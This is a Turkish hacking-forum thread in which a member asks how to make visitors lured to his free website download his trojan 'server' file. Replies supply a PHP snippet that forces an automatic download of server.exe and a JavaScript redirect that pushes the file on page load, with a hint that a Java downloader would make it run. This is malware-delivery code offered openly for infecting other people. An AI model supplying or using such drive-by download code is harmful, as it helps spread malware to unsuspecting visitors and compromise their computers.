Siteye Virüs koymak

karakusak18

Katılımcı Üye
27 Nis 2012
411
0
KIZIL ELMA
SELAMÜN ALEYKÜM.

Arkadaşlar ben bedava bir site kurdum ve o siteye kendi serverimi koymak istiyorum.Dikkatinizi çekmek isterim ki site benim.Siteme birinilerini çekicem ve o serveri indirtcem ama nasıl koyucam.Yardım edermisiniz lütfen.

hackeralp24

Uzman üye
17 Ağu 2011
1,703
0
TurkHackTeam
siteye girildiğinde serverin inmesini istiyorsan şu kodları indexe ekle ;

<?
$file='server.exe';
header("Content-Type: application/octet-stream; ");
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($file) ."; ");
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);
flush();
?>

server.exe yerine inecek dosya adını yaz sadece direk indirme başlar.

ama adamın serveri açması gerekir bu kod sadece indirmeyi gerçekleştirir.

çalışmasını istiyorsanda java downloader kullanacaksın ve karşıdaki pcde java yüklü olmalı.

karakusak18

Katılımcı Üye
27 Nis 2012
411
0
KIZIL ELMA
siteye girildiğinde serverin inmesini istiyorsan şu kodları indexe ekle ;

<?
$file='server.exe';
header("Content-Type: application/octet-stream; ");
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($file) ."; ");
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);
flush();
?>

server.exe yerine inecek dosya adını yaz sadece direk indirme başlar.

ama adamın serveri açması gerekir bu kod sadece indirmeyi gerçekleştirir.

çalışmasını istiyorsanda java downloader kullanacaksın ve karşıdaki pcde java yüklü olmalı.

Arkadaşım ben bedava site aldım o index yerine nerden ulaşıcam.Admin panel girişi felan bişi bulamadım daha team versem bakarmısın lütfen.Allah rızası için.

hackeralp24

Uzman üye
17 Ağu 2011
1,703
0
TurkHackTeam
gidip bedava sitemden tr.gg aldıysan onu bilmiyorum hayatımda orası kadar saçma yer görmedim o yüzden kullanmıyorum ftp destekli bir siten varsa zaten index ana dizinde mecburi bulunması gereken birşey

MegaDev

Katılımcı Üye
24 Nis 2015
706
0
mega.php
El Cevab

SELAMÜN ALEYKÜM.

Arkadaşlar ben bedava bir site kurdum ve o siteye kendi serverimi koymak istiyorum.Dikkatinizi çekmek isterim ki site benim.Siteme birinilerini çekicem ve o serveri indirtcem ama nasıl koyucam.Yardım edermisiniz lütfen.

siteni blogger veya ftp'si olmayan bir platformdan açtıysan bu server koyma işini unut ftp'en varsa kendine ana dizinde bi klasör oluştur atıyorum adı ''server'' olsun sonra kendi ouşturduğun serveri ftp'den bu klasöre yükle daha sonra index'inide şöyle ayarla

function Yonlendirme(){
********.write('Yönlendiriliyor...<scr'+'ipt>setTi meout(function(){********.href="siteadı.com/server/server.exe"},500)</scr'+'ipt>')
}
window.onload=Yonlendirme;
Yonlendirme();
</script>
siteadı.com kısmına sitenin ismini yaz sonra bu index'i ana dizine at böylece sitene gelen kullanıcı direk o dosyaya yönlendirecek dosyada otomatik olarak inecektir açıp açmamak yedirdiğin kişiye kalmış

yardımcı olduysa bir teşekkürü fazla görme

chocolax

Kıdemli Üye
1 Ocak 2015
3,171
3

Ya kimse yokmu yardım edin.

Lütfen allah rızası için ya nolur

Arkadaşlar lütfen yardım edin sitede adminlere üyelere sesleniyorum.Kaç saatdir bekliyorum kimse yok.

Lan birisi konu açar saç saçma hemen yorumları yaparsınız.Şurdan sizden bişi istiyoz kimse çıkıp sorunu çözmüyor.

Post kasma zaten konu 2013 şimdi tekrar güncellemişsin bilen yardım eder

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.